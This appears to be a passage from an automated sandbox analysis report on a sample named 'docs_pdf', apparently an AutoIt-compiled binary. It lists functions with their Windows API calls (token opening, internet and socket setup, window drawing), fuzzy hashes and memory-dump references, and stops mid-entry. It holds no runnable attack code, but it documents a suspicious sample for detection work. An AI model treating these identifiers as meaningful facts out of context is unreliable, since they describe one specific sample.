                                    • Instruction ID: 88bcf47595876e960b2ad0bdba0d9246cbc803c71d157fea2695b21fb444dad7
                                    • Opcode Fuzzy Hash: 7b1be3c0f08cf98664e16f205f4215103fe62e1e85109a5767333d0a2102c16f
                                    • Instruction Fuzzy Hash: 66E0C931A45329BBEB215AA2DC0DEDB7F5CEF2A7A1F008015F689D50A0C6B68540DBA1
                                    Function 00FB2218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSysColor.USER32(00000008), ref: 00FB2231
                                    • SetTextColor.GDI32(?,000000FF), ref: 00FB223B
                                    • SetBkMode.GDI32(?,00000001), ref: 00FB2250
                                    • GetStockObject.GDI32(00000005), ref: 00FB2258
                                    • GetWindowDC.USER32(?,00000000), ref: 00FEC0D3
                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00FEC0E0
                                    • GetPixel.GDI32(00000000,?,00000000), ref: 00FEC0F9
                                    • GetPixel.GDI32(00000000,00000000,?), ref: 00FEC112
                                    • GetPixel.GDI32(00000000,?,?), ref: 00FEC132
                                    • ReleaseDC.USER32(?,00000000), ref: 00FEC13D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                    • String ID:
                                    • API String ID: 1946975507-0
                                    • Opcode ID: dc7693e5c960a33f0607609fef53a6a41bed67f5dcb81c9cc050ed3220be9d87
                                    • Instruction ID: 2dd248f989ec53d626a1ed6ed17f4c3947d62032698e099430efcdc92f2e3897
                                    • Opcode Fuzzy Hash: dc7693e5c960a33f0607609fef53a6a41bed67f5dcb81c9cc050ed3220be9d87
                                    • Instruction Fuzzy Hash: 33E06531900145BADF315F65F80D7D83B14EB06332F008356FBA9880E5C7764581EB52
                                    Function 01008C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentThread.KERNEL32 ref: 01008C63
                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,0100882E), ref: 01008C6A
                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0100882E), ref: 01008C77
                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,0100882E), ref: 01008C7E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: CurrentOpenProcessThreadToken
                                    • String ID:
                                    • API String ID: 3974789173-0
                                    • Opcode ID: ef5ba4e536cb1677d084fe6156a572708e88bf74776301de30543ff64cd1e229
                                    • Instruction ID: b06a3e5a74ab6463e871b3207a4338f502b843468d475ca612c0f7072577029a
                                    • Opcode Fuzzy Hash: ef5ba4e536cb1677d084fe6156a572708e88bf74776301de30543ff64cd1e229
                                    • Instruction Fuzzy Hash: EBE08636E42222DBE7705FB46E0CF567BBCFF41792F048859B2C5C9084DA398041CB52
                                    Function 00FF2187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetDesktopWindow.USER32 ref: 00FF2187
                                    • GetDC.USER32(00000000), ref: 00FF2191
                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00FF21B1
                                    • ReleaseDC.USER32(?), ref: 00FF21D2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: CapsDesktopDeviceReleaseWindow
                                    • String ID:
                                    • API String ID: 2889604237-0
                                    • Opcode ID: 3a2d9b545d05b75cbed68de30e1c852b4005c1a56cc6003a4e9b664a49c38b83
                                    • Instruction ID: fa9d3ea2463a3939345b3606ffe3c2806866d55d6d22d83c8c9ff26185dafb99
                                    • Opcode Fuzzy Hash: 3a2d9b545d05b75cbed68de30e1c852b4005c1a56cc6003a4e9b664a49c38b83
                                    • Instruction Fuzzy Hash: FEE0E575800209EFDB119FB1C808AADBBB9EB4C350F108406F99AA7210CB7D8141AF42
                                    Function 00FF219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetDesktopWindow.USER32 ref: 00FF219B
                                    • GetDC.USER32(00000000), ref: 00FF21A5
                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00FF21B1
                                    • ReleaseDC.USER32(?), ref: 00FF21D2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: CapsDesktopDeviceReleaseWindow
                                    • String ID:
                                    • API String ID: 2889604237-0
                                    • Opcode ID: 489fe7a8e22e227abd514d7166fa850c44c58ddf0bcd680f593004e14d9a352a
                                    • Instruction ID: 2e4ad896e32695a590f5116e255f5922522210982d251ef401e57159e720ae65
                                    • Opcode Fuzzy Hash: 489fe7a8e22e227abd514d7166fa850c44c58ddf0bcd680f593004e14d9a352a
                                    • Instruction Fuzzy Hash: C8E01A75C00205AFCB219FB1C808A9DBBF9EB4C310F108405F99AA7210CB7D9141AF41
                                    Function 0100B7B6 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OleSetContainedObject.OLE32(?,00000001), ref: 0100B981
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ContainedObject
                                    • String ID: AutoIt3GUI$Container
                                    • API String ID: 3565006973-3941886329
                                    • Opcode ID: 5b6804f9f0c09fde4fd04d041456a00ff62305633d8ada38c298e995df47c47f
                                    • Instruction ID: 94886104477d3abae4605fdf481dbdb23e159ab0e97ccfb79482260586bf7fc8
                                    • Opcode Fuzzy Hash: 5b6804f9f0c09fde4fd04d041456a00ff62305633d8ada38c298e995df47c47f
                                    • Instruction Fuzzy Hash: 3D915D746006019FEB65CF68C884A6ABBE9FF49710F14856DF98ACB7A1DB71E840CB50
                                    Function 0101B217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FCFEC6: _wcscpy.LIBCMT ref: 00FCFEE9
                                      • Part of subcall function 00FB9997: __itow.LIBCMT ref: 00FB99C2
                                      • Part of subcall function 00FB9997: __swprintf.LIBCMT ref: 00FB9A0C
                                    • __wcsnicmp.LIBCMT ref: 0101B298
                                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0101B361
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                    • String ID: LPT
                                    • API String ID: 3222508074-1350329615
                                    • Opcode ID: 44cce5dbefff4f50cae8e139cd2bfe6d489abb1c0573c0e66a082440141164f8
                                    • Instruction ID: 2fb1f640e4c8035c592985a010a6217c511a73267a13c5de75676f007c3eacbc
                                    • Opcode Fuzzy Hash: 44cce5dbefff4f50cae8e139cd2bfe6d489abb1c0573c0e66a082440141164f8
                                    • Instruction Fuzzy Hash: B3618775A00215EFDB14DF98C845EEEB7F5EF08310F058099F986AB251D778AE44CB51
                                    Function 00FC2AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.KERNEL32(00000000), ref: 00FC2AC8
                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00FC2AE1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: GlobalMemorySleepStatus
                                    • String ID: @
                                    • API String ID: 2783356886-2766056989
                                    • Opcode ID: cf8ec0c6e4b1bd93095179e84acb68e2f9f02241f3a94fd0c31e5f4f476c327b
                                    • Instruction ID: bea49d4afacc35b41378bbf6978cce3f1bbe106ab1c9e3ab81376310e7b3557a
                                    • Opcode Fuzzy Hash: cf8ec0c6e4b1bd93095179e84acb68e2f9f02241f3a94fd0c31e5f4f476c327b
                                    • Instruction Fuzzy Hash: 4A5168714187449BD320BF11DC86BABBBFCFB85310F42884CF2D991195EB798468DB16
                                    Function 010199BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FB506B: __fread_nolock.LIBCMT ref: 00FB5089
                                    • _wcscmp.LIBCMT ref: 01019AAE
                                    • _wcscmp.LIBCMT ref: 01019AC1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: _wcscmp$__fread_nolock
                                    • String ID: FILE
                                    • API String ID: 4029003684-3121273764
                                    • Opcode ID: 531d3edd268642c7ff9cfb1ea4f713de577693745129eaeadd99571c5025c516
                                    • Instruction ID: fc7a958de356031d1513ab73bb1509819de16add66beafa00a928c3c7303dc87
                                    • Opcode Fuzzy Hash: 531d3edd268642c7ff9cfb1ea4f713de577693745129eaeadd99571c5025c516
                                    • Instruction Fuzzy Hash: 7741DB71A0060ABADF10ABA5CC85FEF7BFDDF45714F004079B640A7185D67999049BA1
                                    Function 01022882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 01022892
                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 010228C8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: CrackInternet_memset
                                    • String ID: |
                                    • API String ID: 1413715105-2343686810
                                    • Opcode ID: c0e1163abdfd7126db43c6ce56f92c6bcfbc7f8ef64c9ea1f8feb9749a9d5a74
                                    • Instruction ID: 2ce39bc0c29eb462e9ef4ebd49da65abe091f09116b3e3be5ccf010530596b76
                                    • Opcode Fuzzy Hash: c0e1163abdfd7126db43c6ce56f92c6bcfbc7f8ef64c9ea1f8feb9749a9d5a74
                                    • Instruction Fuzzy Hash: 41314D71901219AFCF11EFA5CC85EEEBFB9FF08340F104065F814A6165DB359916EB60
                                    Function 01036CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                    Download Yara Rule
                                    APIs
                                    • DestroyWindow.USER32(?,?,?,?), ref: 01036D86
                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 01036DC2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Window$DestroyMove
                                    • String ID: static
                                    • API String ID: 2139405536-2160076837
                                    • Opcode ID: 2d193f2db9383f09253aa1e02bbb58cdd99b7578905ad736ac592b0d7d1b8ca8
                                    • Instruction ID: 01f14faa6ec24f79697568c386600e4f0e2a3f2b2049a51b8eca95acc8c00252
                                    • Opcode Fuzzy Hash: 2d193f2db9383f09253aa1e02bbb58cdd99b7578905ad736ac592b0d7d1b8ca8
                                    • Instruction Fuzzy Hash: A231AF71500605AEEB11AF38CC84AFB77FCFF89720F108619F9A597190DA36A991DB60
                                    Function 01012D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 01012E00
                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 01012E3B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: InfoItemMenu_memset
                                    • String ID: 0
                                    • API String ID: 2223754486-4108050209
                                    • Opcode ID: 20d21a9976434aa5859f5d6ec156d4663b629d36fea7008bae592241abc63814
                                    • Instruction ID: d714271847718e7c3eafe98da0c191ac14d454960c9d6cd295cb9a8d64d2e28c
                                    • Opcode Fuzzy Hash: 20d21a9976434aa5859f5d6ec156d4663b629d36fea7008bae592241abc63814
                                    • Instruction Fuzzy Hash: 2E31F531A00309ABFB649F4CD844BAEBFF9FF05304F2400AAEAC5961A4E7789584CB50
                                    Function 01036943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 010369D0
                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 010369DB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: Combobox
                                    • API String ID: 3850602802-2096851135
                                    • Opcode ID: 3d28f92369d29922b3a409b2e6f2ced120ee5e14aa6a201de409cca00475ab42
                                    • Instruction ID: 9891e4fa7027674b26f4e89a3ff41f8f6538a5d40ac7cba874f3ee0d7d5e38ce
                                    • Opcode Fuzzy Hash: 3d28f92369d29922b3a409b2e6f2ced120ee5e14aa6a201de409cca00475ab42
                                    • Instruction Fuzzy Hash: 1211CB717001097FEF529E18CC90EFB37AEEBC9394F110125F998DB291D6769D5187A0
                                    Function 01036E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FB1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FB1D73
                                      • Part of subcall function 00FB1D35: GetStockObject.GDI32(00000011), ref: 00FB1D87
                                      • Part of subcall function 00FB1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FB1D91
                                    • GetWindowRect.USER32(00000000,?), ref: 01036EE0
                                    • GetSysColor.USER32(00000012), ref: 01036EFA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                    • String ID: static
                                    • API String ID: 1983116058-2160076837
                                    • Opcode ID: 995e7f4b9aeeb4b051686b3bee2154b514b4df3c0be75c56c19e94f30c120caa
                                    • Instruction ID: 2a7b5e5185b4c5c31a6c21de7840bf3821314dd180506b9e8feaa926dd97d39c
                                    • Opcode Fuzzy Hash: 995e7f4b9aeeb4b051686b3bee2154b514b4df3c0be75c56c19e94f30c120caa
                                    • Instruction Fuzzy Hash: C1212972A1020AAFDB14DFA8CD45AEA7BF8FB48314F014619F995D3240E635E861DB60
                                    Function 01036B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetWindowTextLengthW.USER32(00000000), ref: 01036C11
                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 01036C20
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: LengthMessageSendTextWindow
                                    • String ID: edit
                                    • API String ID: 2978978980-2167791130
                                    • Opcode ID: bfe4de127388585838c1b1e1fb632c438ca3a746d8481fd5a2829f0d662155b4
                                    • Instruction ID: 9ae78d9de400ed57001ae54905ae02110ddac9fe822046210226b67ffa5b76cd
                                    • Opcode Fuzzy Hash: bfe4de127388585838c1b1e1fb632c438ca3a746d8481fd5a2829f0d662155b4
                                    • Instruction Fuzzy Hash: 6F11BF71900108BBEB514E68DC41AFB3BADEB85378F104714F9A1971D0C736DC919B60
                                    Function 01012E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 01012F11
                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 01012F30
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: InfoItemMenu_memset
                                    • String ID: 0
                                    • API String ID: 2223754486-4108050209
                                    • Opcode ID: 8c0bec9cc8d8573048ffc512641885780010570295ca44ab47acce112f9b66b9
                                    • Instruction ID: 15534468f622c537117f7a70fe80d47f8b73d3d41fd83eade3dadc644a16d5c3
                                    • Opcode Fuzzy Hash: 8c0bec9cc8d8573048ffc512641885780010570295ca44ab47acce112f9b66b9
                                    • Instruction Fuzzy Hash: C9110B35D01154ABEB60EB5CDC04B9E7BE9EB01310F2400F5E9D5A72A8D7B9E904C791
                                    Function 010224CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 01022520
                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 01022549
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Internet$OpenOption
                                    • String ID: <local>
                                    • API String ID: 942729171-4266983199
                                    • Opcode ID: 60d1819b5cc336cf12c4e7fd6bce896a763485cb848940d109864d0c812f6a07
                                    • Instruction ID: 892e525664b1dc5d235edce19e920b0bc2b9cdad763c875278e888aa0a0a7029
                                    • Opcode Fuzzy Hash: 60d1819b5cc336cf12c4e7fd6bce896a763485cb848940d109864d0c812f6a07
                                    • Instruction Fuzzy Hash: BA110270500235BEDB258F958C99EBBFFACFF06251F00816AF98686000D6706990CAF0
                                    Function 010280A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0102830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,010280C8,?,00000000,?,?), ref: 01028322
                                    • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 010280CB
                                    • htons.WSOCK32(00000000,?,00000000), ref: 01028108
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
